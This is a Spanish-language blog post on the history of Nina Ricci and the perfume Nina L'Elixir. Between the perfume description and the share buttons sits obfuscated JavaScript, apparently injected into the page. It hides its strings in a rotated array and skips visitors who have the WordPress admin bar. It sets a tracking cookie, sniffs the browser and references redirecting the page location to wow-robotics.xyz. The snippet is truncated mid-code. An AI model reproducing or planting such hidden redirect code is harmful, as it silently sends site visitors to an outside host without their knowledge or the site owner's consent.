Nació como María Niel y se hizo famosa como Nina Ricci. Tras décadas de trabajo como diseñadora de otras casas de moda, Nina Ricci abrió su propia casa de moda en 1932 junto a su hijo Robert en París: La casa de Nina Ricci. Con sus colecciones de fragancias románticas y femeninas y las creaciones de costura pronto se hizo un nombre en el mundo de la moda. Con casi 70 años, Nina Ricci, puso fin a su labor activa como diseñadora, sin embargo, el desarrollo de su empresa, nunca perdió de vista el espíritu de la gran dama en la casa de Nina Ricci que siempre está presente.

Su último perfume: Nina L’Elixir…
El nuevo y destacado capítulo del cuento de hadas de Nina. Una intensa y nueva interpretación del Eau de Toilette de Nina. Sensual y sofisticada como una princesa moderna.
Princesa Nina ha evolucionado con su época y se ha convertido en una mujer joven, sensual y rebelde. Nina juega con su poder de atracción y con un toque de impertinencia. La manzana se convierte en una poción de amor irresistible que hace que Nina entre en este nuevo mundo mágico. El frasco de Nina L’Elixir se viste de sensualidad y elegancia gracias al rojo intenso degradado y sus hojas metalizadas. La manzana mágica se hace hechizante. La manzana aparece envuelta de colores muy profundos para reforzar el concepto de Eau de Parfum. La nueva fragancia es una poción de amor, un concentrado que revela poco a poco sus notas mágicas e intensas. Deseable gracias a sus notas chispeantes del limón. Hechizante gracias a las notas golosas y dulces de la manzana de caramelo. Encantadora gracias a las notas sensuales del ámbar.

 

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone